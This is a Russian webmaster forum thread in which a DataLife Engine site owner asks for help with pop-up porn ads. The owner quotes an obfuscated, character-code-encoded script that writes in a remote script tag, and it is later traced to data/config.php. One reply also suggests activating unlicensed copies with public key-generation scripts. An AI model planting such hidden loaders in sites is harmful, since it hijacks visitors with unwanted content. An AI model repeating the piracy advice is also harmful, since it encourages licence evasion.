Нужна помощь по DLE

12
[Удален]
844

Всем привет! Есть сайт на DLE 8.3 в последние дни обнаружил такую штуку: случайно кликаю на пустое место в выскакивает реклама с порнухой, в основном на этот сайт yabloondinka.ru. Просмотрев исходный код страницы обнаружил такого рода код

<script>var temp='',i,c=0,out='';var 
str='60!115!99!114!105!112!116!32!
108!97!110!103!117!97!103!101!61!
34!74!97!118!97!83!99!114!105!112!
116!34!32!115!114!99!61!34!104!116!
116!112!58!47!47!115!101!111!108!
105!110!101!114!46!114!117!47!63!
105!100!61!49!48!53!54!51!54!38!
116!121!112!101!61!112!108!97!
116!105!110!117!109!34!62!60!47!
115!99!114!105!112!116!62!';l=str.
length;while(c<=str.length-1){while
(str.charAt(c)!='!')temp=temp+str.
charAt(c++);c++;out=out+String.
fromCharCode(temp);temp='';}
document.write(out);</script>

Есть подозрение что это какой то вирус или шелл. Возможно этот код появился там в следствии того что я ставил некоторые модули или ещё что то. Короче если кто то с таким сталкивался то очень прошу помогите решить проблему. Могу даже символически заплатить тому кто сможет помочь. Сам сайт в подписи

ewg777
На сайте с 04.06.2007
Offline
225
#1

Минус один DLE.

Есть подозрение что это какой то вирус или шелл.
Варез - немного другое.
[Удален]
#2

ewg777 а по делу что нибудь есть? Как решить данную проблему?

sanya pro
На сайте с 28.02.2009
Offline
27
#3

Первое: Удалить этот код с index.php и main.tpl ☝

Второе: Не сохраняй пароль в FTP (удали его и при каждом входе вводи пароль ручками)🚬

[Удален]
#4

В том то и дело что в index.php и main.tpl я такого кода не нашёл

sanya pro
На сайте с 28.02.2009
Offline
27
#5

он должен быть или в самом верху или внизу кода

sanya pro добавил 01.01.2010 в 15:47

в этих исходниках index.php и main.tpl

sanya pro добавил 01.01.2010 в 15:48

может быть и в main.php

sirota77
На сайте с 08.09.2008
Offline
161
#6
sanya pro:
он должен быть или в самом верху или внизу кода

sanya pro добавил 01.01.2010 в 15:47
в этих исходниках index.php и main.tpl

sanya pro добавил 01.01.2010 в 15:48
может быть и в main.php

Вы не правы, вредоносный код можно засунуть и в другие файлы.

В какие точно не скажу т.к. пьян 🤪

[Удален]
#7

Причина найдена, код был тут \data\config.php

[Удален]
#8

классно вас выимели :)

[Удален]
#9
Есть сайт на DLE 8.3 в последние дни обнаружил такую штуку:

почему то мне кажется, что эта штука была у вас с самого начала =)

Совет: уж если нет денег на лицензию, то ставьте не нулл, а оригинал. (скрипты для генерации ключей есть уже давно в паблике).

sirota77
На сайте с 08.09.2008
Offline
161
#10
GreenDay:
Совет: уж если нет денег на лицензию, то ставьте не нулл, а оригинал. (скрипты для генерации ключей есть уже давно в паблике).

в первые слышу

имхо бред

нашёл dlekey.cn и ооооооооооооооочень сомневаюсь

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий